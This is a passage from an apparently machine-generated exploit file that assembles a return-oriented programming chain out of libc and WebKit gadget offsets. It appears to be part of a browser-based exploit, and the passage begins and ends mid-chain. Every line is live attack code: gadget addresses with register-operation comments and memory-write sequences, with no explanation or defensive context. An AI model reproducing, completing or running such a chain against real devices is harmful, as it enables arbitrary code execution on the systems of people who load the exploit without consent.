[rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1428: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L1429: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1430: db([7, 0]); // 0x7 set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+120824, //L1431 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+120840, //L1432 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1431: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1432: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+835093, //sub rax, rcx ; sbb rdx, rcx libc_base+764760, //pop rsi ropchain+120928, //L1434 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1434: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+120984, //L1435 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1435: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+121088, //L1437 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L1437: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1439: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+121208, //L1442 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+121192, //L1440 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1440: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1442: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+121352, //L1445 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+121320, //L1443 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+121336, //L1444 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1443: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1444: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1445: db([0, 0]); // 0x0 
set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+121424, //L1447 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1447: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+121480, //L1448 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1448: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+121576, //L1451 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1450: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L1451: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1452: db([31, 0]); // 0x1f set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+121672, //L1453 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+121688, //L1454 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1453: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1454: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+121776, //L1456 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1456: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+121832, //L1457 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1457: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+121904, //L1460 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1460: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+121960, //L1461 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1461: db([0, 0]); // 0x0 set_gadgets([ webkit_base+20307877, //mov [rax], rcx libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax //L1463: libc_base+759608, //pop rax libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+122096, //L1464 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L1464: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1466: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+122216, //L1469 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+122200, //L1467 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1467: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1469: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+122360, //L1472 webkit_base+660161, //mov [rsi], rax ; 
mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+122328, //L1470 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+122344, //L1471 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1470: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1471: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1472: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+122432, //L1474 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1474: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+122488, //L1475 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1475: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+122584, //L1478 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1477: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L1478: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1479: db([32, 0]); // 0x20 set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+122680, //L1480 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+122696, //L1481 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1480: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1481: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] 
libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+122784, //L1483 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1483: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+122840, //L1484 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1484: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+122912, //L1487 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1487: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+122968, //L1488 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1488: db([0, 0]); // 0x0 set_gadgets([ webkit_base+20307877, //mov [rax], rcx libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+123056, //L1490 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L1490: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1492: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+123176, //L1495 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+123160, //L1493 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 
//pop rcx ]); //L1493: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1495: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+123320, //L1498 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+123288, //L1496 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+123304, //L1497 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1496: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1497: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1498: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+123392, //L1500 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1500: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+123448, //L1501 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1501: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+123544, //L1504 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1503: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L1504: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1505: db([37, 0]); // 0x25 set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+123640, //L1506 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop 
rsi ropchain+123656, //L1507 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1506: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1507: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+123744, //L1509 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1509: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+123800, //L1510 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1510: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+123904, //L1512 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L1512: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1514: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+124024, //L1517 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+124008, //L1515 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1515: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1517: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+124168, //L1520 webkit_base+660161, //mov [rsi], rax ; mov 
al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+124136, //L1518 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+124152, //L1519 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1518: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1519: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1520: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+124240, //L1522 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1522: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+124296, //L1523 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1523: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+124392, //L1526 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1525: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L1526: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1527: db([33, 0]); // 0x21 set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+124488, //L1528 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+124504, //L1529 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1528: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1529: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] 
libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+124592, //L1531 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1531: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+124648, //L1532 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1532: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+124720, //L1535 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1535: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+124776, //L1536 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1536: db([0, 0]); // 0x0 set_gadgets([ webkit_base+20307877, //mov [rax], rcx libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax //L1538: libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+124912, //L1539 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L1539: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1541: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+125032, //L1544 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+125016, //L1542 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1542: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1544: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+125176, //L1547 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+125144, //L1545 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+125160, //L1546 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1545: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1546: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1547: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+125248, //L1549 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1549: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+125304, //L1550 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1550: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+125400, //L1553 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1552: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L1553: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1554: 
db([34, 0]); // 0x22 set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+125496, //L1555 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+125512, //L1556 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1555: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1556: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+125600, //L1558 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1558: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+125656, //L1559 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1559: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+125728, //L1562 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1562: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+125784, //L1563 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1563: db([0, 0]); // 0x0 set_gadgets([ webkit_base+20307877, //mov [rax], rcx libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax //L1565: libc_base+782311, //pop rsp libc_base+764760 //pop rsi ]); db([8, 0]); 
// 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+125920, //L1566 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L1566: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1568: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+126040, //L1571 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+126024, //L1569 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1569: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1571: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+126184, //L1574 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+126152, //L1572 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+126168, //L1573 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1572: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1573: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1574: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+126256, //L1576 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1576: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+126312, //L1577 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1577: db([0, 0]); // 0x0 
set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+126408, //L1580 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1579: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L1580: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1581: db([35, 0]); // 0x23 set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+126504, //L1582 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+126520, //L1583 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1582: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1583: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+126608, //L1585 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1585: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+126664, //L1586 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1586: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+126736, //L1589 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1589: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+126792, 
